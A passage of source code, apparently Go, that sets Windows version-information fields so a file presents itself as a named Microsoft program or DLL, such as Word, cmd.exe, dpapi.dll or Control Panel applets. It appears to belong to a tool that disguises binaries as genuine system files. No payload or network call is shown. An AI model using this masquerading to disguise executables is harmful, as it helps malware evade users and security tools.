"16.0.11929.20838" 352 | vi.FixedFileInfo.FileVersion.Major = 16 353 | vi.FixedFileInfo.FileVersion.Minor = 0 354 | vi.FixedFileInfo.FileVersion.Patch = 11929 355 | vi.FixedFileInfo.FileVersion.Build = 20838 356 | vi.StringFileInfo.InternalName = "Excel" 357 | } 358 | if name == "Word" { 359 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 360 | vi.StringFileInfo.InternalName = "Word" 361 | vi.StringFileInfo.FileDescription = "Microsoft Word" 362 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 363 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 364 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE" 365 | vi.FixedFileInfo.ProductVersion.Patch = 11929 366 | vi.FixedFileInfo.ProductVersion.Major = 16 367 | vi.FixedFileInfo.ProductVersion.Minor = 0 368 | vi.StringFileInfo.ProductName = "Microsoft Office" 369 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 370 | vi.FixedFileInfo.FileVersion.Major = 16 371 | vi.FixedFileInfo.FileVersion.Minor = 0 372 | vi.FixedFileInfo.FileVersion.Patch = 11929 373 | vi.FixedFileInfo.FileVersion.Build = 20838 374 | vi.StringFileInfo.InternalName = "Word" 375 | } 376 | if name == "Powerpnt" { 377 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 378 | vi.StringFileInfo.InternalName = "POWERPNT" 379 | vi.StringFileInfo.FileDescription = "Microsoft PowerPoint" 380 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 381 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 382 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE" 383 | vi.FixedFileInfo.ProductVersion.Patch = 11929 384 | vi.FixedFileInfo.ProductVersion.Major = 16 385 | vi.FixedFileInfo.ProductVersion.Minor = 0 386 | vi.StringFileInfo.ProductName = "Microsoft Office" 387 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 388 | vi.FixedFileInfo.FileVersion.Major = 16 389 | vi.FixedFileInfo.FileVersion.Minor = 0 390 | vi.FixedFileInfo.FileVersion.Patch = 11929 391 | vi.FixedFileInfo.FileVersion.Build = 20838 392 | vi.StringFileInfo.InternalName = "POWERPNT" 393 | } 394 | if name == "Outlook" { 395 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 396 | vi.StringFileInfo.InternalName = "Outlook.exe" 397 | vi.StringFileInfo.FileDescription = "Microsoft Outlook" 398 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 399 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 400 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE" 401 | vi.FixedFileInfo.ProductVersion.Patch = 11929 402 | vi.FixedFileInfo.ProductVersion.Major = 16 403 | vi.FixedFileInfo.ProductVersion.Minor = 0 404 | vi.StringFileInfo.ProductName = "Microsoft Office" 405 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 406 | vi.FixedFileInfo.FileVersion.Major = 16 407 | vi.FixedFileInfo.FileVersion.Minor = 0 408 | vi.FixedFileInfo.FileVersion.Patch = 11929 409 | vi.FixedFileInfo.FileVersion.Build = 20838 410 | vi.StringFileInfo.InternalName = "Outlook" 411 | } 412 | if name == "lync" { 413 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 414 | vi.StringFileInfo.InternalName = "Lync" 415 | vi.StringFileInfo.FileDescription = "Skype for Business" 416 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 417 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 418 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe" 419 | vi.FixedFileInfo.ProductVersion.Patch = 11929 420 | vi.FixedFileInfo.ProductVersion.Major = 16 421 | vi.FixedFileInfo.ProductVersion.Minor = 0 422 | vi.StringFileInfo.ProductName = "Microsoft Office" 423 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 424 | vi.FixedFileInfo.FileVersion.Major = 16 425 | vi.FixedFileInfo.FileVersion.Minor = 0 426 | vi.FixedFileInfo.FileVersion.Patch = 11929 427 | vi.FixedFileInfo.FileVersion.Build = 20838 428 | vi.StringFileInfo.InternalName = "Lync" 429 | } 430 | if name == "cmd" { 431 | vi.StringFileInfo.InternalName = "cmd" 432 | vi.StringFileInfo.FileDescription = "Windows Command Processor" 433 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 434 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 435 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe" 436 | vi.FixedFileInfo.ProductVersion.Patch = 1 437 | vi.FixedFileInfo.ProductVersion.Major = 10 438 | vi.FixedFileInfo.ProductVersion.Minor = 0 439 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 440 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 441 | vi.FixedFileInfo.FileVersion.Major = 10 442 | vi.FixedFileInfo.FileVersion.Minor = 0 443 | vi.FixedFileInfo.FileVersion.Patch = 1 444 | vi.FixedFileInfo.FileVersion.Build = 18362 445 | vi.StringFileInfo.InternalName = "cmd.exe" 446 | } 447 | if name == "OneDrive" { 448 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 449 | vi.StringFileInfo.InternalName = "OneDrive.exe" 450 | vi.StringFileInfo.FileDescription = "Microsoft OneDrive" 451 | vi.StringFileInfo.FileVersion = "20.114.0607.0002" 452 | vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved." 453 | vi.StringFileInfo.OriginalFilename = "OneDrive.exe" 454 | vi.FixedFileInfo.ProductVersion.Patch = 2 455 | vi.FixedFileInfo.ProductVersion.Major = 20 456 | vi.FixedFileInfo.ProductVersion.Minor = 114 457 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 458 | vi.StringFileInfo.ProductVersion = "20.114.0607.0002" 459 | vi.FixedFileInfo.FileVersion.Major = 20 460 | vi.FixedFileInfo.FileVersion.Minor = 114 461 | vi.FixedFileInfo.FileVersion.Patch = 2 462 | vi.FixedFileInfo.FileVersion.Build = 607 463 | vi.StringFileInfo.InternalName = "OneDrive.exe" 464 | } 465 | if name == "apphelp" { 466 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 467 | vi.StringFileInfo.InternalName = "Apphelp" 468 | vi.StringFileInfo.FileDescription = "Application Compatibility Client Library" 469 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 470 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 471 | vi.StringFileInfo.LegalTrademarks = "" 472 | vi.FixedFileInfo.ProductVersion.Patch = 18362 473 | vi.FixedFileInfo.ProductVersion.Major = 10 474 | vi.FixedFileInfo.ProductVersion.Minor = 0 475 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 476 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 477 | vi.FixedFileInfo.FileVersion.Major = 10 478 | vi.FixedFileInfo.FileVersion.Minor = 0 479 | vi.FixedFileInfo.FileVersion.Patch = 18362 480 | vi.FixedFileInfo.FileVersion.Build = 1 481 | vi.StringFileInfo.OriginalFilename = "Apphelp.dll" 482 | } 483 | if name == "bcryptprimitives" { 484 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 485 | vi.StringFileInfo.InternalName = "bcryptprimitives.dll" 486 | vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library" 487 | vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)" 488 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 489 | vi.StringFileInfo.LegalTrademarks = "" 490 | vi.FixedFileInfo.ProductVersion.Patch = 18362 491 | vi.FixedFileInfo.ProductVersion.Major = 10 492 | vi.FixedFileInfo.ProductVersion.Minor = 0 493 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 494 | vi.StringFileInfo.ProductVersion = "10.0.18362.836" 495 | vi.FixedFileInfo.FileVersion.Major = 10 496 | vi.FixedFileInfo.FileVersion.Minor = 0 497 | vi.FixedFileInfo.FileVersion.Patch = 18362 498 | vi.FixedFileInfo.FileVersion.Build = 836 499 | vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll" 500 | } 501 | if name == "cfgmgr32" { 502 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 503 | vi.StringFileInfo.InternalName = "cfgmgr32.dll" 504 | vi.StringFileInfo.FileDescription = "Configuration Manager DLL" 505 | vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)" 506 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 507 | vi.StringFileInfo.LegalTrademarks = "" 508 | vi.FixedFileInfo.ProductVersion.Patch = 18362 509 | vi.FixedFileInfo.ProductVersion.Major = 10 510 | vi.FixedFileInfo.ProductVersion.Minor = 0 511 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 512 | vi.StringFileInfo.ProductVersion = "10.0.18362.387" 513 | vi.FixedFileInfo.FileVersion.Major = 10 514 | vi.FixedFileInfo.FileVersion.Minor = 0 515 | vi.FixedFileInfo.FileVersion.Patch = 18362 516 | vi.FixedFileInfo.FileVersion.Build = 387 517 | vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll" 518 | } 519 | if name == "combase" { 520 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 521 | vi.StringFileInfo.InternalName = "COMBASE.DLL" 522 | vi.StringFileInfo.FileDescription = "Microsoft COM for Windows" 523 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 524 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 525 | vi.StringFileInfo.LegalTrademarks = "" 526 | vi.FixedFileInfo.ProductVersion.Patch = 18362 527 | vi.FixedFileInfo.ProductVersion.Major = 10 528 | vi.FixedFileInfo.ProductVersion.Minor = 0 529 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 530 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 531 | vi.FixedFileInfo.FileVersion.Major = 10 532 | vi.FixedFileInfo.FileVersion.Minor = 0 533 | vi.FixedFileInfo.FileVersion.Patch = 18362 534 | vi.FixedFileInfo.FileVersion.Build = 1 535 | vi.StringFileInfo.OriginalFilename = "COMBASE.DLL" 536 | } 537 | if name == "cryptsp" { 538 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 539 | vi.StringFileInfo.InternalName = "cryptsp.dll" 540 | vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API" 541 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 542 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 543 | vi.StringFileInfo.LegalTrademarks = "" 544 | vi.FixedFileInfo.ProductVersion.Patch = 18362 545 | vi.FixedFileInfo.ProductVersion.Major = 10 546 | vi.FixedFileInfo.ProductVersion.Minor = 0 547 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 548 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 549 | vi.FixedFileInfo.FileVersion.Major = 10 550 | vi.FixedFileInfo.FileVersion.Minor = 0 551 | vi.FixedFileInfo.FileVersion.Patch = 18362 552 | vi.FixedFileInfo.FileVersion.Build = 1 553 | vi.StringFileInfo.OriginalFilename = "cryptsp.dll" 554 | } 555 | if name == "dnsapi" { 556 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 557 | vi.StringFileInfo.InternalName = "dnsapi" 558 | vi.StringFileInfo.FileDescription = "DNS Client API DLL" 559 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 560 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 561 | vi.StringFileInfo.LegalTrademarks = "" 562 | vi.FixedFileInfo.ProductVersion.Patch = 18362 563 | vi.FixedFileInfo.ProductVersion.Major = 10 564 | vi.FixedFileInfo.ProductVersion.Minor = 0 565 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 566 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 567 | vi.FixedFileInfo.FileVersion.Major = 10 568 | vi.FixedFileInfo.FileVersion.Minor = 0 569 | vi.FixedFileInfo.FileVersion.Patch = 18362 570 | vi.FixedFileInfo.FileVersion.Build = 1 571 | vi.StringFileInfo.OriginalFilename = "dnsapi" 572 | } 573 | if name == "dpapi" { 574 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 575 | vi.StringFileInfo.InternalName = "dpapi.dll" 576 | vi.StringFileInfo.FileDescription = "Data Protection API" 577 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 578 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 579 | vi.StringFileInfo.LegalTrademarks = "" 580 | vi.FixedFileInfo.ProductVersion.Patch = 18362 581 | vi.FixedFileInfo.ProductVersion.Major = 10 582 | vi.FixedFileInfo.ProductVersion.Minor = 0 583 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 584 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 585 | vi.FixedFileInfo.FileVersion.Major = 10 586 | vi.FixedFileInfo.FileVersion.Minor = 0 587 | vi.FixedFileInfo.FileVersion.Patch = 18362 588 | vi.FixedFileInfo.FileVersion.Build = 1 589 | vi.StringFileInfo.OriginalFilename = "dpapi.dll" 590 | } 591 | if name == "sechost" { 592 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 593 | vi.StringFileInfo.InternalName = "sechost.dll" 594 | vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs" 595 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 596 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 597 | vi.StringFileInfo.LegalTrademarks = "" 598 | vi.FixedFileInfo.ProductVersion.Patch = 18362 599 | vi.FixedFileInfo.ProductVersion.Major = 10 600 | vi.FixedFileInfo.ProductVersion.Minor = 0 601 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 602 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 603 | vi.FixedFileInfo.FileVersion.Major = 10 604 | vi.FixedFileInfo.FileVersion.Minor = 0 605 | vi.FixedFileInfo.FileVersion.Patch = 18362 606 | vi.FixedFileInfo.FileVersion.Build = 1 607 | vi.StringFileInfo.OriginalFilename = "sechost.dll" 608 | } 609 | if name == "schannel" { 610 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 611 | vi.StringFileInfo.InternalName = "schannel.dll" 612 | vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider" 613 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 614 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 615 | vi.StringFileInfo.LegalTrademarks = "" 616 | vi.FixedFileInfo.ProductVersion.Patch = 18362 617 | vi.FixedFileInfo.ProductVersion.Major = 10 618 | vi.FixedFileInfo.ProductVersion.Minor = 0 619 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 620 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 621 | vi.FixedFileInfo.FileVersion.Major = 10 622 | vi.FixedFileInfo.FileVersion.Minor = 0 623 | vi.FixedFileInfo.FileVersion.Patch = 18362 624 | vi.FixedFileInfo.FileVersion.Build = 1 625 | vi.StringFileInfo.OriginalFilename = "schannel.dll" 626 | } 627 | if name == "urlmon" { 628 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 629 | vi.StringFileInfo.InternalName = "UrlMon.dll" 630 | vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32" 631 | vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)" 632 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 633 | vi.StringFileInfo.LegalTrademarks = "" 634 | vi.FixedFileInfo.ProductVersion.Patch = 18362 635 | vi.FixedFileInfo.ProductVersion.Major = 11 636 | vi.FixedFileInfo.ProductVersion.Minor = 0 637 | vi.StringFileInfo.ProductName = "Internet Explorer" 638 | vi.StringFileInfo.ProductVersion = "11.00.18362.1" 639 | vi.FixedFileInfo.FileVersion.Major = 10 640 | vi.FixedFileInfo.FileVersion.Minor = 0 641 | vi.FixedFileInfo.FileVersion.Patch = 18362 642 | vi.FixedFileInfo.FileVersion.Build = 1 643 | vi.StringFileInfo.OriginalFilename = "UrlMon.dll" 644 | } 645 | if name == "win32u" { 646 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 647 | vi.StringFileInfo.InternalName = "Win32u" 648 | vi.StringFileInfo.FileDescription = "Win32u" 649 | vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)" 650 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 651 | vi.StringFileInfo.LegalTrademarks = "" 652 | vi.FixedFileInfo.ProductVersion.Patch = 18362 653 | vi.FixedFileInfo.ProductVersion.Major = 10 654 | vi.FixedFileInfo.ProductVersion.Minor = 0 655 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 656 | vi.StringFileInfo.ProductVersion = "10.0.18362.900" 657 | vi.FixedFileInfo.FileVersion.Major = 10 658 | vi.FixedFileInfo.FileVersion.Minor = 0 659 | vi.FixedFileInfo.FileVersion.Patch = 18362 660 | vi.FixedFileInfo.FileVersion.Build = 1 661 | vi.StringFileInfo.OriginalFilename = "Win32u" 662 | } 663 | if name == "appwizard" { 664 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 665 | vi.StringFileInfo.InternalName = "appwiz.cpl" 666 | vi.StringFileInfo.FileDescription = "Shell Application Manager" 667 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 668 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 669 | vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI" 670 | vi.FixedFileInfo.ProductVersion.Patch = 18362 671 | vi.FixedFileInfo.ProductVersion.Major = 10 672 | vi.FixedFileInfo.ProductVersion.Minor = 0 673 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 674 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 675 | vi.FixedFileInfo.FileVersion.Major = 10 676 | vi.FixedFileInfo.FileVersion.Minor = 0 677 | vi.FixedFileInfo.FileVersion.Patch = 18362 678 | vi.FixedFileInfo.FileVersion.Build = 1 679 | vi.StringFileInfo.InternalName = "appwiz.cpl" 680 | } 681 | if name == "bthprop" { 682 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 683 | vi.StringFileInfo.InternalName = "bthprops.cpl" 684 | vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet" 685 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 686 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 687 | vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui" 688 | vi.FixedFileInfo.ProductVersion.Patch = 18362 689 | vi.FixedFileInfo.ProductVersion.Major = 10 690 | vi.FixedFileInfo.ProductVersion.Minor = 0 691 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 692 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 693 | vi.FixedFileInfo.FileVersion.Major = 10 694 | vi.FixedFileInfo.FileVersion.Minor = 0 695 | vi.FixedFileInfo.FileVersion.Patch = 18362 696 | vi.FixedFileInfo.FileVersion.Build = 1 697 | vi.StringFileInfo.InternalName = "bthprops.cpl" 698 | } 699 | if name == "desktop" { 700 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 701 | vi.StringFileInfo.InternalName = "desk.cpl" 702 | vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel" 703 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 704 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 705 | vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI" 706 | vi.FixedFileInfo.ProductVersion.Patch = 18362 707 | vi.FixedFileInfo.ProductVersion.Major = 10 708 | vi.FixedFileInfo.ProductVersion.Minor = 0 709 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 710 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 711 | vi.FixedFileInfo.FileVersion.Major = 10 712 | vi.FixedFileInfo.FileVersion.Minor = 0 713 | vi.FixedFileInfo.FileVersion.Patch = 18362 714 | vi.FixedFileInfo.FileVersion.Build = 1 715 | vi.StringFileInfo.InternalName = "DESK" 716 | 717 | } 718 | if name == "netfirewall" { 719 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 720 | vi.StringFileInfo.InternalName = "Firewall.cpl" 721 | vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub" 722 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 723 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 724 | vi.StringFileInfo.OriginalFilename = "Firewall.cpl" 725 | vi.FixedFileInfo.ProductVersion.Patch = 18362 726 | vi.FixedFileInfo.ProductVersion.Major = 10 727 | vi.FixedFileInfo.ProductVersion.Minor = 0 728 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 729 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 730 | vi.FixedFileInfo.FileVersion.Major = 10 731 | vi.FixedFileInfo.FileVersion.Minor = 0 732 | vi.FixedFileInfo.FileVersion.Patch = 18362 733 | vi.FixedFileInfo.FileVersion.Build = 1 734 | vi.StringFileInfo.InternalName = "Firewall.cpl" 735 | } 736 | if name == "FlashPlayer" { 737 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 738 | vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0" 739 | vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet" 740 | vi.StringFileInfo.FileVersion = "32.0.0.255" 741 | vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries." 742 | vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl" 743 | vi.FixedFileInfo.ProductVersion.Patch = 0 744 | vi.FixedFileInfo.ProductVersion.Major = 32 745 | vi.FixedFileInfo.ProductVersion.Minor = 0 746 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 747 | vi.StringFileInfo.ProductVersion = "32.0.0.255" 748 | vi.FixedFileInfo.FileVersion.Major = 32 749 | vi.FixedFileInfo.FileVersion.Minor = 0 750 | vi.FixedFileInfo.FileVersion.Patch = 0 751 | vi.FixedFileInfo.FileVersion.Build = 255 752 | vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl" 753 | } 754 | if name == "hardwarewiz" { 755 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 756 | vi.StringFileInfo.InternalName = "hdwwiz.cpl" 757 | vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet" 758 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 759 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 760 | vi.StringFileInfo.OriginalFilename = "hdwwiz.cpl.mui" 761 | vi.FixedFileInfo.ProductVersion.Patch = 18362 762 | vi.FixedFileInfo.ProductVersion.Major = 10 763 | vi.FixedFileInfo.ProductVersion.Minor = 0 764 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 765 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 766 | vi.FixedFileInfo.FileVersion.Major = 10 767 | vi.FixedFileInfo.FileVersion.Minor = 0 768 | vi.FixedFileInfo.FileVersion.Patch = 18362 769 | vi.FixedFileInfo.FileVersion.Build = 1 770 | vi.StringFileInfo.InternalName = "hdwwiz" 771 | } 772 | if name == "inet" { 773 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 774 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 775 | vi.StringFileInfo.FileDescription = "Internet Control Panel" 776 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 777 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 778 | vi.StringFileInfo.OriginalFilename = "" 779 | vi.FixedFileInfo.ProductVersion.Patch = 18362 780 | vi.FixedFileInfo.ProductVersion.Major = 10 781 | vi.FixedFileInfo.ProductVersion.Minor = 0 782 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 783 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 784 | vi.FixedFileInfo.FileVersion.Major = 10 785 | vi.FixedFileInfo.FileVersion.Minor = 0 786 | vi.FixedFileInfo.FileVersion.Patch = 18362 787 | vi.FixedFileInfo.FileVersion.Build = 1 788 | vi.StringFileInfo.InternalName = "inetcpl.cpl" 789 | } 790 | if name == "control" { 791 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 792 | vi.StringFileInfo.InternalName = "intl.cpl" 793 | vi.StringFileInfo.FileDescription = "Control Panel DLL" 794 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 795 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 796 | vi.StringFileInfo.OriginalFilename = "" 797 | vi.FixedFileInfo.ProductVersion.Patch = 18362 798 | vi.FixedFileInfo.ProductVersion.Major = 10 799 | vi.FixedFileInfo.ProductVersion.Minor = 0 800 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 801 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 802 | vi.FixedFileInfo.FileVersion.Major = 10 803 | vi.FixedFileInfo.FileVersion.Minor = 0 804 | vi.FixedFileInfo.FileVersion.Patch = 18362 805 | vi.FixedFileInfo.FileVersion.Build = 1 806 | vi.StringFileInfo.InternalName = "CONTROL" 807 | } 808 | if name == "irprop" { 809 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 810 | vi.StringFileInfo.InternalName = "irprops.cpl" 811 | vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet" 812 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 813 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 814 | vi.StringFileInfo.OriginalFilename = "irprops.cpl" 815 | vi.FixedFileInfo.ProductVersion.Patch = 18362 816 | vi.FixedFileInfo.ProductVersion.Major = 10 817 | vi.FixedFileInfo.ProductVersion.Minor = 0 818 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 819 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 820 | vi.FixedFileInfo.FileVersion.Major = 10 821 | vi.FixedFileInfo.FileVersion.Minor = 0 822 | vi.FixedFileInfo.FileVersion.Patch = 18362 823 | vi.FixedFileInfo.FileVersion.Build = 1 824 | vi.StringFileInfo.InternalName = "Infrared Properties" 825 | } 826 | if name == "Game" { 827 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 828 | vi.StringFileInfo.InternalName = "joy.cpl" 829 | vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet" 830 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 831 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 832 | vi.StringFileInfo.OriginalFilename = "JOY.CPL.MUI" 833 | vi.FixedFileInfo.ProductVersion.Patch = 18362 834 | vi.FixedFileInfo.ProductVersion.Major = 10 835 | vi.FixedFileInfo.ProductVersion.Minor = 0 836 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 837 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 838 | vi.FixedFileInfo.FileVersion.Major = 10 839 | vi.FixedFileInfo.FileVersion.Minor = 0 840 | vi.FixedFileInfo.FileVersion.Patch = 18362 841 | vi.FixedFileInfo.FileVersion.Build = 1 842 | vi.StringFileInfo.InternalName = "JOY.CPL" 843 | } 844 | if name == "inputs" { 845 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 846 | vi.StringFileInfo.InternalName = "main.cpl" 847 | vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets" 848 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 849 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 850 | vi.StringFileInfo.OriginalFilename = "main.cpl.mui" 851 | vi.FixedFileInfo.ProductVersion.Patch = 18362 852 | vi.FixedFileInfo.ProductVersion.Major = 10 853 | vi.FixedFileInfo.ProductVersion.Minor = 0 854 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 855 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 856 | vi.FixedFileInfo.FileVersion.Major = 10 857 | vi.FixedFileInfo.FileVersion.Minor = 0 858 | vi.FixedFileInfo.FileVersion.Patch = 18362 859 | vi.FixedFileInfo.FileVersion.Build = 1 860 | vi.StringFileInfo.InternalName = "main.cpl" 861 | 862 | } 863 | if name == "mimosys" { 864 | 